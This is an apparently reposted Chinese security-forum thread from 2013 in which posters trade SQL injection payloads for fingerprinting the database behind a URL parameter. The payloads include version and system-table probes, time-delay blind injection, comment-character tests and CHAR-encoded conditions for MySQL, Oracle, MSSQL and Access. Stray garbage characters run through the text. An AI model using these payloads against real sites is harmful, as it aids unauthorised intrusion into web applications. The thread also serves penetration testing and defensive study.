一个注射点如何最快速确认是什么类型数据库
; P, \/ T* a# Q6 x4 s6 Ixsser (十根阳具有长短!!) | 2013-02-05 12:36$ E" m. {1 q' l
假设这么一个注射点:$ T+ F2 R5 q J& P5 P6 Y
show.html?id=2
( {. A. U9 A, g" Umysql:id=2 and version()>0
/ E0 X# ~$ z5 goracle:id=2 and '1'||'1'='11
6 e5 B+ V. r4 C) o# a' A6 B其他的欢迎补充
! w' U5 ]8 R7 M: q1#; S$ B. n/ N a
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
8 A& T* ?0 O! k3 V7 |Access:
8 S1 W4 Z# o. a6 f/ PaNd aSc(cHr(97))=97
/ e. Z9 L M6 F. K! X* W& f! ]and exists(select id from MSysAccessObjects)
! Y6 h' N" x4 I; S% {/ ^+ VSQL Server:0 G* \8 N4 U) h
and exists(select id from sysobjects)6 b+ K# o7 F1 D+ w. ?! e z. N
and length(user)>00 C* h/ v) ]* F& a( B9 x
MySQL:8 V p- Z/ d! M) o: h
and length(user())>0
# P$ j7 o, }7 K# d0 z5 [' @2#
7 M+ m! p1 a4 S2 k# [, s+ ~+ Oxsser (十根阳具有长短!!) | 2013-02-05 12:48
9 H2 \: w" J/ M) M' R1 F@upload 如果这些都不是呢…
$ H- N% B( D; ]( h3#
R# W; I9 A, q% F0 O1 U& A& v. Mupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
! v' h* P0 V! T# y@xsser 不快速的,延时注入
' |: }8 ~1 ?! p% U不知道这样写对不对
1 ^# M" {. I$ Q" d7 ~( j1 C0 C( lmssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'; a/ h9 A6 C! g8 P) j
mysql:id=2 and select benchmark(1e8,current_date());
" A. j' J8 ?- j3 A0 t4#, b7 ^, Y/ S O b3 s; a& ~2 p
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10( R3 L5 t6 p5 b; o
最快的貌似是看报错信息: n7 S' U2 M6 C O; G
oracle error
* g9 [' e* X4 C4 Z' y: fmssql error
+ B1 Z+ e( Y1 d+ B! s6 s. U( Y$ Pmysql error
4 Q1 p# c+ B' w/ Q5#* _% s3 h# s% @* i/ B5 I
Nimda (你们都是坏银~) | 2013-02-05 13:14
9 G. y7 |" _! p& c. }3 Q! e' O3 Q小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)
- h0 m' G( R M, x) [2 X# v* O6#
+ B( {* I: [0 r& }$ ^) \upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
2 x! B6 a w; t! i“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
0 Q$ Z" t# i O* q$ V; d3 y: L2 K“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:4 l2 B; _7 L) w6 o" @
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。& ^2 n' k2 h% e A
7#
2 J9 f1 d$ D2 `* z! b3 Q4 g_Evil (HackEnd) | 2013-02-05 13:33
7 w. @* @' z" XPostgreSQL/ c* p$ D, U5 a. r+ { c' z' c
8#* m( A& w/ h# T/ p) \, n5 U' u
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
: }( ?7 U) P: |4 @$ ~, M. U切换编码 and 1=19 m2 U6 F; {5 M% C5 n! ~
oracle:
1 B. R! J) f! e) ?& O! FCHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49): E* G" F) l; }9 H+ Q
mssql:: ^/ Q) f, j0 m
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
! Q5 {: k: B, Q9 zmysql:& A# N* |. k" i0 t; \
CHAR(97, 110, 100, 32, 49, 61, 49)9 B# D6 {( p% G
9#
. G3 A# M% D1 B! O3 C$ x0 Z- axsser (十根阳具有长短!!) | 2013-02-05 14:31
# N Y3 H4 t, @7 h! Y2 m@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
5 u. _( e7 c/ t6 g( B10#
3 ~5 o) n. e/ K, M. A3 [" J. eupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
" N! p$ |" A r z@xsser 是奇葩数据库类型的么?$ l5 p' A0 a) y+ i8 }, S5 y
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
4 u1 L4 B& W1 f5 B$ J$ F4 t0 a1.是否可以使用特定的函数来判断,该数据库特有的% j3 a) b2 v6 Z8 U
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等8 ?8 x6 a" V* }
3.是否可以编码查询
: ]$ v) }1 A& g% R$ s4.是否显可以利用错信息
" g0 ?5 X: s6 R9 x( |5 t; W5.是否存在数据库某些特性辅助判断
`2 X" P1 G; W: X6 I0 G个人见解; p9 r+ q6 `3 s& b1 s5 s
11#7 B/ Z6 x8 `, a
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
& C: E* m, e. n* n4 `已收藏,mssql可以直接看到错误提示的吧~9 r S2 K% _4 A0 @, F% M8 M+ F
12#* \( m* I3 v0 |& z9 M" w9 r
Passer_by | 2013-02-05 15:09/ E) E2 I+ L6 @
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。( v* v L- H9 J8 l
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对